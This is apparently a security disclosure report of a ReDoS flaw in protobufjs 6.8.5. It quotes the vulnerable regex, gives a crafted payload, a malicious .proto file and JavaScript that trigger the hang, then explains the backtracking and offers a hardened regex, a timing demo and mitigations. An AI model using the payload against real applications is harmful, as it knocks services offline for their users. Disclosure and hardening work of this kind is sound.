I would like to report a ReDoS in protobufjs.
It allows an attacker to cause a Denial of Service by having the application parse (or load) a crafted *.proto file.
module name: protobufjs
version: 6.8.5
npm page: https://www.npmjs.com/package/[MODULE NAME]
> Protocol Buffers are a language-neutral, platform-neutral, extensible way of serializing structured data for use in communications protocols, data storage, and more, originally designed at Google.
22 592 downloads in the last day
352 974 downloads in the last week
1 321 151 downloads in the last month
~15 853 812 estimated downloads per year
ReDoS.
Vulnerable regex:
/^(?:\.?[a-zA-Z_][a-zA-Z_0-9]*)+$/
Payload (a run of identifier characters followed by a character the pattern cannot match):
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx!
proto file:
// awesome.proto
package awesomepackage;
syntax = "proto3";
message AwesomeMessage {
option (my_option) = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx!;
}
js file:
require('protobufjs').load("./awesome.proto", () => {});
or, just with parse:
require('protobufjs').parse(`
package awesomepackage;
syntax = "proto3";
message AwesomeMessage {
option (my_option) = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx!;
}
`, () => {});
Impact: denial of service by parsing a crafted *.proto file.
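Why the regex above blows up, shown as an added example (not protobufjs code): `\.?` is optional, so a run of identifier characters can be split between repetitions of the group in 2^(n-1) ways, and on a non-matching input the backtracking engine tries every split. The SAFE pattern below is an assumed linear-time rewrite that accepts exactly the same strings (optional leading dot, then dot-separated identifiers) but forces every extra segment to begin with a literal dot, so there is nothing left to backtrack over.

```javascript
// Regex quoted in the report (protobufjs 6.8.5 type-reference check).
const VULNERABLE = /^(?:\.?[a-zA-Z_][a-zA-Z_0-9]*)+$/;

// Assumed hardened equivalent: same language, no ambiguity about where one
// identifier ends and the next one starts, so matching is linear in the input.
const SAFE = /^\.?[a-zA-Z_][a-zA-Z_0-9]*(?:\.[a-zA-Z_][a-zA-Z_0-9]*)*$/;

// Build the report's non-matching input: n identifier characters, then "!".
function payload(n) {
  return "x".repeat(n) + "!";
}

// Time one regex against one input, in milliseconds.
function timeMatch(re, input) {
  const start = process.hrtime.bigint();
  re.test(input);
  return Number(process.hrtime.bigint() - start) / 1e6;
}

// True when both regexes accept/reject every input the same way.
function agree(inputs) {
  return inputs.every((s) => VULNERABLE.test(s) === SAFE.test(s));
}

// Constructed inputs covering accepted and rejected shapes.
const SAMPLES = [
  "foo", ".foo", "foo.bar", ".a_b.c1", "_", "a1b2",
  "", ".", "foo.", "foo..bar", "1foo", "foo-bar", payload(12),
];

function demo() {
  console.log("regexes agree on samples:", agree(SAMPLES));
  // Each extra "x" roughly doubles the time for VULNERABLE; SAFE stays flat.
  // Kept to n <= 20 so the demo finishes quickly; the report's 45 would not.
  for (const n of [14, 16, 18, 20]) {
    const p = payload(n);
    const v = timeMatch(VULNERABLE, p).toFixed(2);
    const s = timeMatch(SAFE, p).toFixed(2);
    console.log(`n=${n} vulnerable=${v}ms safe=${s}ms`);
  }
}

demo();
```

Until the parser is fixed, treating *.proto files from untrusted sources as untrusted input (validate or reject them before calling load/parse, and parse in a worker with a timeout) limits the impact.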